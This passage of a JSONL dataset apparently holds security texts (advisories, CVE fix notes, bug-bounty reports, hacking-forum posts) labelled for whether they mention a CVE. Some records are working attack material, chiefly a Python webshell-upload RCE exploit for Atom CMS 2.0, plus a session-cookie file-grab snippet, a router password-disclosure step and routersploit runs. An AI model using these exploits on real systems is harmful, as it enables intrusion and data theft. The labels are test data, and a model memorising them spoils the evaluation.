print(\"PHP Session ID: \" + session.cookies.get_dict()['PHPSESSID'])\n print(\"user direcotry: \" + user_direcotry)\n print(\"Curl example:\")\n print('curl --cookie \"PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '\" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)", "source": "exploitdb", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b994e6365f4f235f0cca", "text": "Bundler allows attacker to inject arbitrary code via secondary Gem source\n\n[Severity: CRITICAL]\n\nBundler 1.x might allow remote attackers to inject arbitrary Ruby code into an application by leveraging a gem name collision on a secondary source. NOTE: this might overlap CVE-2013-0334.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "89b832f065747cde17f6", "text": "CVE: CVE-2022-1345\n\n[{'lang': 'en', 'value': \"Stored XSS viva .svg file upload in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "091694db03151870cbee", "text": "CVE: CVE-2021-3856\n\n[{'lang': 'en', 'value': 'ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader. By sending requests for theme resources with a relative path from an external HTTP client, the client will receive the content of random files if available.'}]\n\nFix commit: [KEYCLOAK-19422] ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4f43cb327ee0cd705917", "text": "CVE: CVE-2022-23578\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. If a graph node is invalid, TensorFlow can leak memory in the implementation of `ImmutableExecutorState::Initialize`. Here, we set `item->kernel` to `nullptr` but it is a simple `OpKernel*` pointer so the memory that was previously allocated to it would leak. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix memory leak when a graph node is invalid.\n\nIf a graph node is invalid but a kernel is created then we set the kernel back to `nullptr` but we forget to delete it. Hence, we get a memory leak.\n\nPiperOrigin-RevId: 408968108\nChange-Id: I1d8a9d0d8988ed5e08be8b9f2004ce1b4cd11b7c", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "473ae382954d7543cfd7", "text": "Have you found how to decode ? I’m approaching the same problem", "source": "hackthebox", "timestamp": "2023-11-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3f3e64506159811b52e2", "text": "Research Project Low-level attack on HTTP\n\nHi, I hope everyone is okay. I am doing a research project for my Bachelor of IT (honours) on Machine Learning for Cloud Security. I will be installing Oracle Virtualbox on my Macbook pro (32GB RAM, 1TB SSD, i7 Quad-Core). In addition, I will be using Kali Linux, an MS Windows Server 2019 as a Domain Controller, an MS-Windows Server as a Webserver with a website hosted on it. An MS Windows 10 machine as a Client workstation. There will be another MS Windows server to capture all the network traffic, primarily HTTP altogether; there will be four servers and one client machine. All of these machines will be installed and configured in the Oracle Virtualbox. Using the Kali Linux machine, I will perform a low-intensity DDoS attack on the HTTP protocol of the MS Windows webserver. The Kali machine will be on a separate network address as I want to show that the attacker is attacking from outside the network. Rest all the rest of servers will be on the same network address I want to perform a low-level intensity attack on the HTTP protocol. This attack will be made on the webserver. The standalone server will be part of the domain controller on which I want to capture network traffic. The reason for capturing network traffic is to run Support Vector Machine (SVM) on it for training and then run SVM for testing. Training can be one script, and testing can be another script. Now my query is How is it possible to perform an attack from one separate network to another different network resource? Is there any good tools or script to perform a low-level intensity attack on the HTTP protocol on an MS Windows webserver? The attack is performed on the webserver, and I want to capture network traffic on another standalone server. How it can be done, and which software or tools should I use.? I shall be highly grateful if someone can guide me in this. Thanks & Regard, Osama Faheem", "source": "go4expert", "timestamp": "2022-03-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "57a7d69bc77acdad51e5", "text": "No, it is not possible to determine who was included in the Bcc field of an email you received. Recipients who are included in the Bcc field are hidden from all other recipients of the email, including those in the \"To:\" and \"Cc:\" fields. The purpose of the Bcc field is to enable the sender to include recipients without disclosing their identities to others on the email thread. This can be useful for situations where the sender wants to send an email to multiple recipients, but does not want all of them to know who else received the message. If you were not included in the Bcc field of the email, there is no way for you to see who was included in that field.", "source": "go4expert", "timestamp": "2023-04-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c934451f951ad95b95cf", "text": "Improper Restriction of XML External Entity Reference in Apache Solr\n\n[Severity: HIGH]\n\nThe (1) UpdateRequestHandler for XSLT or (2) XPathEntityProcessor in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, different vectors than CVE-2013-6407.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d4e85c96f0efe35d9eea", "text": "How to bypass Cloudflare and see real Hosting IP\n\nI want to see some website more information, like real hosting IP/name. It’s been behind Cloudflare I tried tools from Github like Cloudmare/Cloudunflare which cannot figure out any information from that website. “Cloudfail” have some errors when I try to run python script on website. Is there any recon tool on parrot which I can try? Or any method which shows me more information about this website. (I don’t want to share website publicly, but could on PM if needed. It’s seems btw good secure website.", "source": "parrotsec", "timestamp": "2022-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2373c584178c891f85ad", "text": "CVE: CVE-2022-23596\n\n[{'lang': 'en', 'value': 'Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible.'}]\n\nFix commit: fix: invalid subheader type would throw npe and make the extract loop\n\ncloses #73", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e35f967af309d4e9a4a1", "text": "CVE: CVE-2022-1330\n\n[{'lang': 'en', 'value': 'stored xss due to unsantized anchor url in GitHub repository alvarotrigo/fullpage.js prior to 4.0.4. stored xss .'}]\n\nFix commit: Merge pull request #4360 from ranjit-git/ranjit-git-patch-1\n\nRanjit git patch 1", "source": "cvefixes", "timestamp": "2022-04-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "aaa765007b95dd5cfc9a", "text": "Uh the MacBook Pro usually for stuff Windows X Server if anything “What are youre programs?” Open Server 10 Visual Studio Outlook Email Windows X Server Hackintosh — cofee 4 conversation but theres no almond", "source": "hackersploit", "timestamp": "2022-05-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4aecd7c1b137631f65f8", "text": "Wavlink WN530HG4 - Password Disclosure\n\n# Exploit Title: Wavlink WN530HG4 - Password Disclosure\n# Date: 2022-06-12\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: M30HG4.V5030.191116\n# Vendor home page : wavlink.com\n# Authentication Required: No\n# CVE : CVE-2022-34047\n# Tested on: Windows\n\n# Exploit\n\nview-source:http://IP_address/set_safety.shtml?r=52300\nsearch for var syspasswd=\"\nyou will find the username and the password", "source": "exploitdb", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "701b586922d5996c5753", "text": "CVE: CVE-2021-45933\n\n[{'lang': 'en', 'value': 'wolfSSL wolfMQTT 1.9 has a heap-based buffer overflow (8 bytes) in MqttDecode_Publish (called from MqttClient_DecodePacket and MqttClient_HandlePacket).'}]\n\nFix commit: Fix wolfmqtt-fuzzer: Null-dereference WRITE in MqttProps_Free", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c2a67729cb685da1816d", "text": "I am also getting the VMWare-42 xx xx xx bunch of numbers if I get it from WMIC in command or get-wmiobject in powershell. Does anyone have any good advice on this?", "source": "hackthebox", "timestamp": "2022-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a3fd00cd89e640360dd1", "text": "CVE: CVE-2022-1544\n\n[{'lang': 'en', 'value': 'Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.'}]\n\nFix commit: Merge pull request #7 from luyadev/csv-sanitizer\n\nCsv sanitizer", "source": "cvefixes", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "93d20f1de0a594425ccd", "text": "did you try to grep the output of the error.log file ??", "source": "hackthebox", "timestamp": "2022-09-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b2a4df7e2738a7743756", "text": "The target is the one you get from “spawn target” in the Questions section. The Wireshark file offered in the ressources it’s only to get the image file, after that you spawn a target and connect to it USING no machine and realize an active scan from there. Check for a POST request there after a few minutes of scan.", "source": "hackthebox", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "09d77b3325752322d54e", "text": "CVE: CVE-2022-28796\n\n[{'lang': 'en', 'value': 'jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.'}]\n\nFix commit: jbd2: fix use-after-free of transaction_t race\n\njbd2_journal_wait_updates() is called with j_state_lock held. But if\nthere is a commit in progress, then this transaction might get committed\nand freed via jbd2_journal_commit_transaction() ->\njbd2_journal_free_transaction(), when we release j_state_lock.\nSo check for journal->j_running_transaction everytime we release and\nacquire j_state_lock to avoid use-after-free issue.\n\nLink: https://lore.kernel.org/r/948c2fed518ae739db6a8f7f83f1d58b504f87d0.1644497105.git.ritesh.list@gmail.com\nFixes: 4f98186848707f53 (\"jbd2: refactor wait logic for transaction updates into a common function\")\nCc: stable@kernel.org\nReported-and-tested-by: syzbot+afa2ca5171d93e44b348@syzkaller.appspotmail.com\nReviewed-by: Jan Kara \nSigned-off-by: Ritesh Harjani \nSigned-off-by: Theodore Ts'o ", "source": "cvefixes", "timestamp": "2022-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "74a8605514b09a0390f4", "text": "Just grabbed the last flag. Upgrading the shell is necessary for the last flag, I used a static solution mentioned in the previous link. Happy to help others if desired.", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "22c2917bc1e3bd144b69", "text": "Bolt Cross-site Scripting via the slug, teaser or title parameters\n\n[Severity: MEDIUM]\n\nBolt 3.6.4 has XSS via the slug, teaser, or title parameter to `editcontent/pages`, a related issue to CVE-2017-11128 and CVE-2018-19933.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "273bf95940e07fad3ee4", "text": "OpenBullet 2 V0.2.4\n\n300×177 9.31 KB Install the Microsoft .NET 6 (desktop apps version) from Download .NET 6.0 Download Link : Site Hunter OpenBullet 2 V0.2.4 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a2f113b6dfd0f396ee4b", "text": "Atom CMS 2.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)\n# Date: 22.03.2022\n# Exploit Author: Ashish Koli (Shikari)\n# Vendor Homepage: https://thedigitalcraft.com/\n# Software Link: https://github.com/thedigicraft/Atom.CMS\n# Version: 2.0\n# Tested on: Ubuntu 20.04.3 LTS\n# CVE: CVE-2022-25487\n\n# Description\nThis script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.\n\n# Usage : python3 exploit.py \n# Example: python3 exploit.py 127.0.0.1 80 /atom\n\n# POC Exploit: https://youtu.be/qQrq-eEpswc\n# Note: Crafted \"Shell.txt\" file is required for exploitation which is available on the below link:\n# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC\n\n'''\nDescription:\nA file upload functionality in Atom CMS 2.0 allows any\nnon-privileged user to gain access to the host through the uploaded files,\nwhich may result in remote code execution.\n'''\n\n#!/usr/bin/python3\n'''\nImport required modules:\n'''\nimport sys\nimport requests\nimport json\nimport time\nimport urllib.parse\nimport struct\nimport re\nimport string\nimport linecache\n\n\n\nproxies = {\n 'http': 'http://localhost:8080',\n 'https': 'https://localhost:8080',\n}\n\n'''\nUser Input:\n'''\ntarget_ip = sys.argv[1]\ntarget_port = sys.argv[2]\natomcmspath = sys.argv[3]\n\n\n'''\nGet cookie\n'''\nsession = requests.Session()\nlink = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'\nresponse = session.get(link)\ncookies_session = session.cookies.get_dict()\ncookie = json.dumps(cookies_session)\ncookie = cookie.replace('\"}','')\ncookie = cookie.replace('{\"', '')\ncookie = cookie.replace('\"', '')\ncookie = cookie.replace(\" \", '')\ncookie = cookie.replace(\":\", '=')\n\n'''\nUpload Webshell:\n'''\n# Construct Header:\nheader1 = {\n 'Host': target_ip,\n 'Accept': 'application/json',\n 'Cache-Control': 'no-cache',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',\n 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',\n 'Origin': 'http://' + target_ip,\n 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cookie': cookie,\n 'Connection': 'close',\n\n}\n\n\n# loading Webshell payload:\npath = 'shell.txt'\nfp = open(path,'rb')\ndata= fp.read()\n\n\n# Uploading Webshell:\nlink_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'\nupload = requests.post(link_upload, headers=header1, data=data)\n\np=upload.text\nx = re.sub(\"\\s\", \"\\n\", p)\ny = x.replace(\"1 Unknown\", \"null\")\nz = re.sub('[^0-9]', '', y)\n\n'''\nFinish:\n'''\nprint('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')\nprint('')", "source": "exploitdb", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "feaf28fef83333f1fe64", "text": "[Improper Synchronization] CVE-2023-28320: siglongjmp race condition\n\n## Summary:\nIf the system has no POSIX or Windows threading support, `USE_ALARM_TIMEOUT` codepath will be used in `lib/hostip.c`. If two threads will perform DNS resolving, a wrong register context can be used on the signal handler`siglongjmp` call if DNS timeout occurs. Typically this results in segmentation fault, but depending on platform specifics other impacts might be possible (but unlikely).\n\nThe documentation warns against this very issue in https://curl.se/libcurl/c/threadsafe.html `It is important that libcurl can find and use thread safe versions of these and other system calls, as otherwise it cannot function fully thread safe.` The issue is that there is no way for the application using libcurl to know if the library is MT safe for DNS resolution or not. `CURL_VERSION_THREADSAFE` is mentioned, but this checks availability of atomic init, not MT safety of DNS resolution.\n\nA remote attacker in a privileged network position is able to selectively block the DNS responses and may thus induce the affected target application to crash.\n\n## Steps To Reproduce:\n\n 1. For quick testing on POSIX systems add `#define USE_ALARM_TIMEOUT` to `lib/hostip.c`, for example:\n ```\ndiff --git a/lib/hostip.c b/lib/hostip.c\nindex 2381290fd..0148f2861 100644\n--- a/lib/hostip.c\n+++ b/lib/hostip.c\n@@ -75,6 +75,7 @@\n /* alarm-based timeouts can only be used with all the dependencies satisfied */\n #define USE_ALARM_TIMEOUT\n #endif\n+#define USE_ALARM_TIMEOUT\n\n #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */\n\n ```\n 2. Compile libcurl\n 3. Compile version of https://curl.se/libcurl/c/multithread.html but add `curl_easy_setopt(curl, CURLOPT_TIMEOUT, 2);` to `pull_one_url` function.\n 4. Change DNS config to point to blackhole DNS server at `3.219.212.117` (blackhole.webpagetest.org)\n 5. Execute the compiled `multithread` and the application will segfault.\n\n```\n$ LD_LIBRARY_PATH=./lib/.libs:$LD_LIBRARY_PATH gdb ./multithread\nGNU gdb (Debian 13.1-2) 13.1\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType \"show copying\" and \"show warranty\" for details.\nThis GDB was configured as \"x86_64-linux-gnu\".\nType \"show configuration\" for configuration details.\nFor bug reporting instructions, please see:\n .\nFind the GDB manual and other documentation resources online at:\n .\n\nFor help, type \"help\".\nType \"apropos word\" to search for commands related to \"word\"...\nReading symbols from ./multithread...\n(No debugging symbols found in ./multithread)\n(gdb) r\nStarting program: /home/user/curl/multithread\n/home/user/curl/multithread: ./lib/.libs/libcurl.so.4: no version information available (required by /home/user/curl/multithread)\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n[New Thread 0x7ffff6ffc6c0 (LWP 2733684)]\nThread 0, gets http://curl.haxx.se/\n[New Thread 0x7ffff67fb6c0 (LWP 2733685)]\nThread 1, gets ftp://cool.haxx.se/\n[New Thread 0x7ffff5ffa6c0 (LWP 2733686)]\n[New Thread 0x7ffff57f96c0 (LWP 2733687)]\nThread 2, gets http://www.contactor.se/\n[New Thread 0x7ffff4ff86c0 (LWP 2733688)]\n[New Thread 0x7fffe77fe6c0 (LWP 2733690)]\n[New Thread 0x7fffe7fff6c0 (LWP 2733689)]\nThread 3, gets www.haxx.se\n[New Thread 0x7fffe6ffd6c0 (LWP 2733691)]\n\nThread 1 \"multithread\" received signal SIGSEGV, Segmentation fault.\n0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n(gdb) bt\n#0 0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n#1 0x00007ffff7f546dd in Curl_resolv_timeout () from ./lib/.libs/libcurl.so.4\n#2 0x0000000000000000 in ?? ()\n```\n\n## Risk discussion\nI don't consider this issue a major risk since it likely will affect only small percentage of target platforms. Some ", "source": "hackerone", "timestamp": "2023-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "310b00314b4dd7459422", "text": "CVE: CVE-2022-31101\n\n[{'lang': 'en', 'value': \"prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.\"}]\n\nFix commit: Merge pull request from GHSA-2jx3-5j9v-prpp\n\nValidate order by and order way", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5a5791cae2ffc6c93cf1", "text": "curl -s https://www.inlanefreight.com | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" | sort -u | wc -l Description: curl -s retrieves the HTML content of the webpage https://www.inlanefreight.com in a silent mode without showing progress meter or error messages. grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" searches for all the links within the HTML content of the webpage by matching the regular expression (http|https)://[a-zA-Z0-9./?=_-]* . This regular expression matches any string that starts with http:// or https:// followed by any combination of letters, digits, slashes, question marks, underscores, and dashes. sort -u sorts and removes any duplicate links from the output. wc -l counts the number of lines in the output, which represents the total number of unique links found on the webpage.", "source": "hackthebox", "timestamp": "2023-05-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "90fdb424554e5cf08933", "text": "I didn’t understand. alternative web connection sir? You mean any internet connection to download drivers…", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7b1c907affa9f3471a92", "text": "how to pentest a CISCO ISR 4331 with routersploit, when this model of router is not included in routersploits list of routers it can exploit\n\nHey there I’m trying to pentest a CISCO ISR 4331 using routersploit. But this model of router is not on the list of routers routersploit has available to exploit. when I try running routersploit running the autopwn on this router I just get the following results. All creds and routers “not vulnerable” except these ones below. “IP” Could not verify exploitability : http exploits/routers/asus/asuwart_lan_rce http exploits/routers/shuttle/915wm_dns_change http exploits/routers/netgear/dgn2200-dnslookup_cgi_rce custom/tcp exploits/routers/cisco/catalyst_2960_rocem http exploits/routers/cisco/secure_acs_bypass http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change http exploits/routers/dlink/dsl_2640b_dns_change http exploits/routers/dlink/dsl_2740r_dns_change custom/udp exploits/routers/dlink/dir_815_850l_rce http exploits/routers/billion/billion_5200w_rce http exploits/routers/3com/officeconnect_rce I’m having trouble finding YouTube video or manual that explain how to properly investigate these links that cannot be verified. I also get mixed signals from these links even they they are not the same models as my router. After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -rsf (3Com OfficeConnect RCE) > use exploits/routers/asus/asuswrt_lan_rce rsf (AsusWRT Lan RCE) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Enable verbose output: true/false infosvr_port 9999 Target InfoSVR Port rsf (AsusWRT Lan RCE) > set target [+] target => rsf (AsusWRT Lan RCE) > set target ip [+] target => rsf (AsusWRT Lan RCE) > run [*] Running module exploits/routers/asus/asuswrt_lan_rce… [-] Connection error: http::80/vpnupload.cgi [-] Failed to set ateCommand_flag variable =>[dont know what to do here] ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// rsf (AsusWRT Lan RCE) > use exploits/routers/shuttle/915wm_dns_change rsf (Shuttle 915 WM DNS Change) > set target ip [+] target => ip rsf (Shuttle 915 WM DNS Change) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target ip Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Verbosity enabled: true/false dns1 8.8.8.8 Primary DNS Server dns2 8.8.4.4 Seconary DNS Server rsf (Shuttle 915 WM DNS Change) > run [ ] Running module exploits/routers/shuttle/915wm_dns_change… [ ] Attempting to change DNS settings… [ ] Primary DNS: 8.8.8.8 [ ] Secondary DNS: 8.8.4.4 [-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1 =>[dont know what to do here] ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// rsf (Shuttle 915 WM DNS Change) > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce rsf (Netgear DGN2200 RCE) > set target “ip” [+] target => “ip” rsf (Netgear DGN2200 RCE) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Verbosity enabled: true/false username admin Username password password Password rsf (Netg", "source": "hackersploit", "timestamp": "2022-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d8e13574ecd56537a8ef", "text": "I have a different problem, I dont get any errors but I don’t see any hashes at all, I am using kali not parrot", "source": "hackthebox", "timestamp": "2022-08-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e1688d334eb0f1782979", "text": "Hey guys a little help please. I see the the flag1.txt in the history of htb-student. But it is actually not present. please help", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0d6a0f4335c6f1a2a62f", "text": "I just found a solution for us, you can’t upload files to the windows virtual machine in the usual way but we can indirectly upload the upload_win.zip file to the windows server, what you need to do is: 1)encode the file upload_win.zip with the system you used to download it in base64 2)copy the base64 string you just got and use the following command at the parrot-htb virtual machine to get the original .zip file: echo | base64 -d -w 0 > upload_win.zip 3)you run http server service at parrot virtual machine 4)RDP to the window virtual machine and download the file upload_win.zip from the parrot virtual machine by the command in module => you will have .zip file in your Windows VM", "source": "hackthebox", "timestamp": "2022-03-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "86203e57a72b6ba1200f", "text": "netstat -l4t | awk ‘{print $4, $6}’ | grep 0.0.0.* | wc -l", "source": "hackthebox", "timestamp": "2023-07-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6cf7ca12679cb004911e", "text": "CVE: CVE-2021-20298\n\n[{'lang': 'en', 'value': \"A flaw was found in OpenEXR's B44Compressor. This flaw allows an attacker who can submit a crafted file to be processed by OpenEXR, to exhaust all memory accessible to the application. The highest threat from this vulnerability is to system availability.\"}]\n\nFix commit: reduce B44 _tmpBufferSize (was allocating two bytes per byte) (#843)\n\nSigned-off-by: Peter Hillman ", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ae4e9b1ca95d310e4f32", "text": "[Insufficiently Protected Credentials] Credential leak on redirect\n\n## Summary:\n[add summary of the vulnerability]\n\nCurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Create a 302.php file, such as:\n```\n\n```\nAdd the 2 record in the /etc/hosts file: \n```\n127.0.0.1 a.com\n127.0.0.1 b.com\n```\n 2. curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\n# curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:22:06 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n```\n 3. curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L \n```\n# curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:24:15 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n```\n\nThe reason for the problem is that curl's filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Proxy-Authorization\n\n## Impact\n\nLeak of Proxy-Authorization and x-auth-token headers.", "source": "hackerone", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b9fa5501359496cddfab", "text": "I’m still stuck. I’m not able to make out all the hints that people gave in here. I would really appreciate if anyone could give me somemore hints or can provide me any resources so that I could understand this topic well", "source": "hackthebox", "timestamp": "2023-05-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
